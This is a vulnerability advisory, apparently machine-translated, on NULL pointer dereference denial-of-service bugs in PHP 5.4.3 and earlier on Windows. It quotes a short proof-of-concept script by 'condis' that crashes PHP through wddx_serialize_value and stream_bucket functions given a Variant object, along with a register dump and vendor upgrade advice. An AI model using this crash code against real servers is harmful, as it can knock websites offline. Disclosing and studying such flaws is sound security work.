Multiple php null pointer reference Denial of Service Vulnerability

Release date:
Updated on:

Affected Systems:
PHP 5.4.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53643

PHP is an embedded HTML language. PHP is similar to Microsoft's ASP. It is a script language that is executed on the server side and embedded in HTML documents, the language style is similar to the C language and is widely used by many website programmers.

In versions earlier than PHP 5.4.3, there are multiple DoS vulnerabilities caused by NULL pointer reference. Attackers can exploit these vulnerabilities to cause application crash.

<* Source: condis
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<? Php

/*

PHP <= 5.4.3 wddx_serialize _ */stream_bucket _ * Variant Object Null Ptr Derefernce
Author: condis
Date: 10.04.2012 AD
Web: http://cond.psychodela.pl

----

Download: http://php.net/downloads.php

Tested on:

PHP 5.3.8 + Windows XP SP3 Professional PL
PHP 5.3.10 + Windows XP SP3 Professional PL
PHP 5.4.0 + Windows XP SP3 Professional PL
PHP 5.4.3 + Windows XP SP3 Professional PL

Description:

Wddx_serialize_value and wddx_serialize_vars functions fails to handle Variant
Object when it is given as a first argument.

Registers:

EAX 00000000
ECX 1056AAE8 php5ts. 1056AAE8
EDX 100EFCE0 php5ts. 100EFCE0
EBX 01032AB0
ESP 00C0FAE0
Eback 00000000
ESI 0121E478
EDI 0121CB50
EIP 1028F22E php5ts. 1028F22E

Crash:

1028F22E 8A45 25 mov al, byte ptr ss: [EBP + 25]

Situation looks pretty much the same for both wddx_serialize_vars and
Wddx_serialize_value. Also functions stream_bucket_prepend and stream_bucket_append
Have some problems with handling Variant object when given as a second argument:

Stream_bucket_append (1, new Variant (1 ));
Stream_bucket_prepend (1, new Variant (1 ));

PS: Variant object is only available in PHP for Windows OS and it was implemented
In PHP> 4.1.0 and PHP 5.

For more details check: http://php.net/manual/en/class.variant.php

PS2: After running this via webserver my Apache wasn't able to handle requests
Anymore and I had to restart him :)

Kthxbye

*/

Wddx_serialize_value (new Variant (666 ));

?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PHP
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.php.net